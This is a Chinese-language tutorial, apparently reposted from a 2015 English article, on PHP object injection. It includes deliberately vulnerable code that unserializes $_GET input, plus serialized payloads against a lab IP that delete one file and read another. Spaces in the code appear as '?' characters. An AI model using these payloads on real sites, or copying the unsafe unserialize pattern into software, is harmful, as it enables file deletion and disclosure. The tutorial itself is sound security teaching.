php對象注入是一個非常常見的漏洞，這個類型的漏洞雖然有些難以利用，但仍舊非常危險。為了理解這個漏洞，請讀者具備基礎的php知識。類和變量是非常容易理解的php概念。舉個例子，1.php在一個類中定義了一個變量和一個方法。它創建了一個對象并且調用了PrintVariable函數，該函數會輸出變量variable。

[php]?view plain?copy

<?php????

?????

class?TestClass????

{????

????//?一個變量????

?????

????public?$variable?=?'This?is?a?string';????

?????

????//?一個簡單的方法????

?????

????public?function?PrintVariable()????

????{????

????????echo?$this->variable;????

????}????

}????

?????

//?創建一個對象????

?????

$object?=?new?TestClass();????

?????

//?調用一個方法????

?????

$object->PrintVariable();????

?????

?>???

?

php類可能會包含一些特殊的函數叫magic函數，magic函數命名是以符號__開頭的，比如 __construct, __destruct, __toString, __sleep, __wakeup等等。這些函數在某些情況下會自動調用，比如__construct當一個對象創建時被調用，__destruct當一個對象銷毀時被調用，__toString當一個對象被當作一個字符串使用。為了更好的理解magic方法是如何工作的，在2.php中增加了三個magic方法，__construct, __destruct和__toString。可以看出，__construct在對象創建時調用，__destruct在php腳本結束時調用，__toString在對象被當作一個字符串使用時調用。

[php]?view plain?copy

<?php????

?????

class?TestClass????

{????

????//?一個變量????

?????

????public?$variable?=?'This?is?a?string';????

?????

????//?一個簡單的方法????

?????

????public?function?PrintVariable()????

????{????

????????echo?$this->variable?.?'<br?/>';????

????}????

?????

????//?Constructor????

?????

????public?function?__construct()????

????{????

????????echo?'__construct?<br?/>';????

????}????

?????

????//?Destructor????

?????

????public?function?__destruct()????

????{????

????????echo?'__destruct?<br?/>';????

????}????

?????

????//?Call????

?????

????public?function?__toString()????

????{????

????????return?'__toString<br?/>';????

????}????

}????

?????

//?創建一個對象????

//??__construct會被調用????

?????

$object?=?new?TestClass();????

?????

//?創建一個方法?????

?????

$object->PrintVariable();????

?????

//?對象被當作一個字符串????

//??__toString會被調用????

?????

echo?$object;????

?????

//?End?of?PHP?script????

//?腳本結束__destruct會被調用????

?????

?>???

php允許保存一個對象方便以后重用，這個過程被稱為序列化。為什么要有序列化這種機制呢?在傳遞變量的過程中，有可能遇到變量值要跨腳本文件傳遞的過程。試想，如果為一個腳本中想要調用之前一個腳本的變量，但是前一個腳本已經執行完畢，所有的變量和內容釋放掉了，我們要如何操作呢?難道要前一個腳本不斷的循環，等待后面腳本調用?這肯定是不現實的。serialize和unserialize就是用來解決這一問題的。serialize可以將變量轉換為字符串并且在轉換中可以保存當前變量的值；unserialize則可以將serialize生成的字符串變換回變量。讓我們在3.php中添加序列化的例子，看看php對象序列化之后的格式。

[php]?view plain?copy

<?php????

?????

//?某類????

?????

class?User????

{????

????//?類數據????

?????

????public?$age?=?0;????

????public?$name?=?'';????

?????

????//?輸出數據????

?????

????public?function?PrintData()????

????{????

????????echo?'User?'?.?$this->name?.?'?is?'?.?$this->age????

?????????????.?'?years?old.?<br?/>';????

????}????

}????

?????

//?創建一個對象????

?????

$usr?=?new?User();????

?????

//?設置數據????

?????

$usr->age?=?20;????

$usr->name?=?'John';????

?????

//?輸出數據????

?????

$usr->PrintData();????

?????

//?輸出序列化之后的數據????

?????

echo?serialize($usr);????

?????

?>???

為了使用這個對象，在4.php中用unserialize重建對象。

[php]?view plain?copy

<?php????

?????

//?某類????

?????

class?User????

{????

????//?Class?data????

?????

????public?$age?=?0;????

????public?$name?=?'';????

?????

????//?Print?data????

?????

????public?function?PrintData()????

????{????

????????echo?'User?'?.?$this->name?.?'?is?'?.?$this->age?.?'?years?old.?<br?/>';????

????}????

}????

?????

//?重建對象????

?????

$usr?=?unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}');????

?????

//?調用PrintData?輸出數據????

?????

$usr->PrintData();????

?????

?>???

magic函數__construct和__destruct會在對象創建或者銷毀時自動調用；__sleep magic方法在一個對象被序列化的時候調用；__wakeup magic方法在一個對象被反序列化的時候調用。在5.php中添加這幾個magic函數的例子。

[php]?view plain?copy

<?php????

?????

class?Test????

{????

????public?$variable?=?'BUZZ';????

????public?$variable2?=?'OTHER';????

?????

????public?function?PrintVariable()????

????{????

????????echo?$this->variable?.?'<br?/>';????

????}????

?????

????public?function?__construct()????

????{????

????????echo?'__construct<br?/>';????

????}????

?????

????public?function?__destruct()????

????{????

????????echo?'__destruct<br?/>';????

????}????

?????

????public?function?__wakeup()????

????{????

????????echo?'__wakeup<br?/>';????

????}????

?????

????public?function?__sleep()????

????{????

????????echo?'__sleep<br?/>';????

?????

????????return?array('variable',?'variable2');????

????}????

}????

?????

//?創建對象調用__construct??

?????

$obj?=?new?Test();????

?????

//?序列化對象調用__sleep????

?????

$serialized?=?serialize($obj);????

?????

//?輸出序列化后的字符串????

?????

print?'Serialized:?'?.?$serialized?.?'<br?/>';????

?????

//?重建對象調用__wakeup????

?????

$obj2?=?unserialize($serialized);????

?????

//?調用PintVariable輸出數據???

?????

$obj2->PrintVariable();????

?????

//?腳本結束調用__destruct?????

?????

?>???

現在我們了解序列化是如何工作的，但是我們如何利用它呢?有多種可能的方法，取決于應用程序、可用的類和magic函數。記住，序列化對象包含攻擊者控制的對象值。你可能在Web應用程序源代碼中找到一個定義__wakeup或__destruct的類，這些函數會影響Web應用程序。例如，我們可能會找到一個臨時將日志存儲到文件中的類。當銷毀時對象可能不再需要日志文件并將其刪除。把下面這段代碼保存為logfile.php。

[php]?view plain?copy

<?php?????

?????

class?LogFile????

{????

????//?log文件名????

?????

????public?$filename?=?'error.log';????

?????

????//?儲存日志文件????

?????

????public?function?LogData($text)????

????{????

????????echo?'Log?some?data:?'?.?$text?.?'<br?/>';????

????????file_put_contents($this->filename,?$text,?FILE_APPEND);????

????}????

?????

????//?刪除日志文件????

?????

????public?function?__destruct()????

????{????

????????echo?'__destruct?deletes?"'?.?$this->filename?.?'"?file.?<br?/>';????

????????unlink(dirname(__FILE__)?.?'/'?.?$this->filename);????

????}????

}????

?????

?>???

這是一個使用它的例子。

[php]?view plain?copy

<?php????

?????

include?'logfile.php';????

?????

//?創建一個對象????

?????

$obj?=?new?LogFile();????

?????

//?設置文件名和要儲存的日志數據????

?????

$obj->filename?=?'somefile.log';????

$obj->LogData('Test');????

?????

//?腳本結束__destruct被調用somefile.log文件被刪除??

?????

?>???

在其它腳本中我們可能找到一個unserialize的調用，并且參數是用戶提供的。把下面這段代碼保存為test.php。

[php]?view plain?copy

<?php????

?????

include?'logfile.php';????

?????

//?...?一些使用LogFile類的代碼...????

?????

//?簡單的類定義????

?????

class?User????

{????

????//?類數據????

?????

????public?$age?=?0;????

????public?$name?=?'';????

?????

????//?輸出數據????

?????

????public?function?PrintData()????

????{????

????????echo?'User?'?.?$this->name?.?'?is?'?.?$this->age?.?'?years?old.?<br?/>';????

????}????

}????

?????

//?重建用戶輸入的數據????

?????

$usr?=?unserialize($_GET['usr_serialized']);????

?????

?>???

創建利用代碼111.php。

[php]?view plain?copy

<?php????

??

include?'logfile.php';????

??

$obj?=?new?LogFile();????

$obj->filename?=?'1.php';????

?????

echo?serialize($obj)?.?'<br?/>';????

?????

?>???

訪問http://192.168.153.138/test.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:5:"1.php";}。

顯示已經刪除了1.php。驗證一下，果然成功刪除了。

這就是漏洞名稱的由來：在變量可控并且進行了unserialize操作的地方注入序列化對象，實現代碼執行或者其它坑爹的行為。先不談 __wakeup 和 __destruct，還有一些很常見的注入點允許你利用這個類型的漏洞，一切都是取決于程序邏輯。舉個例子，某用戶類定義了一個__toString為了讓應用程序能夠將類作為一個字符串輸出(echo $obj)，而且其他類也可能定義了一個類允許__toString讀取某個文件。把下面這段代碼保存為test.php。

[php]?view plain?copy

<?php?????

?????

//?…?一些include?...????

?????

class?FileClass????

{????

????//?文件名????

?????

????public?$filename?=?'error.log';????

?????

????//?當對象被作為一個字符串會讀取這個文件????

?????

????public?function?__toString()????

????{????

????????return?file_get_contents($this->filename);????

????}????

}????

?????

//?Main?User?class????

?????

class?User????

{????

????//?Class?data????

?????

????public?$age?=?0;????

????public?$name?=?'';????

?????

????//?允許對象作為一個字符串輸出上面的data????

?????

????public?function?__toString()????

????{????

????????return?'User?'?.?$this->name?.?'?is?'?.?$this->age?.?'?years?old.?<br?/>';????

????}????

}????

?????

//?用戶可控????

?????

$obj?=?unserialize($_GET['usr_serialized']);????

?????

//?輸出__toString????

?????

echo?$obj;????

?????

?>???

訪問http://192.168.153.138/test.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}。

?

但是如果我們用序列化調用FileClass呢?先建立一個1.txt。

創建利用代碼123.php。

[php]?view plain?copy

<?php????

???

include?'test.php';????

$fileobj?=?new?FileClass();????

$fileobj->filename?=?'1.txt';????

?????

echo?serialize($fileobj);????

?????

?>???

訪問http://192.168.153.138/test.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:5:"1.txt";}。

成功顯示了文本內容。也可以使用其他magic函數：如果對象將調用一個不存在的函數__call將被調用；如果對象試圖訪問不存在的類變量__get和__set將被調用。但是利用這種漏洞并不局限于magic函數，在普通的函數上也可以采取相同的思路。例如User類可能定義一個get方法來查找和打印一些用戶數據，但是其他類可能定義一個從數據庫獲取數據的get方法，這從而會導致SQL注入漏洞。set或write方法會將數據寫入任意文件，可以利用它獲得遠程代碼執行。唯一的技術問題是注入點可用的類，但是一些框架或腳本具有自動加載的功能。最大的問題在于人：理解應用程序以能夠利用這種類型的漏洞，因為它可能需要大量的時間來閱讀和理解代碼。
原文地址：https://securitycafe.ro/2015/01/05/understanding-php-object-injection/

轉載于:https://www.cnblogs.com/gongchixin/articles/8108957.html

總結

以上是生活随笔為你收集整理的理解php反序列化漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。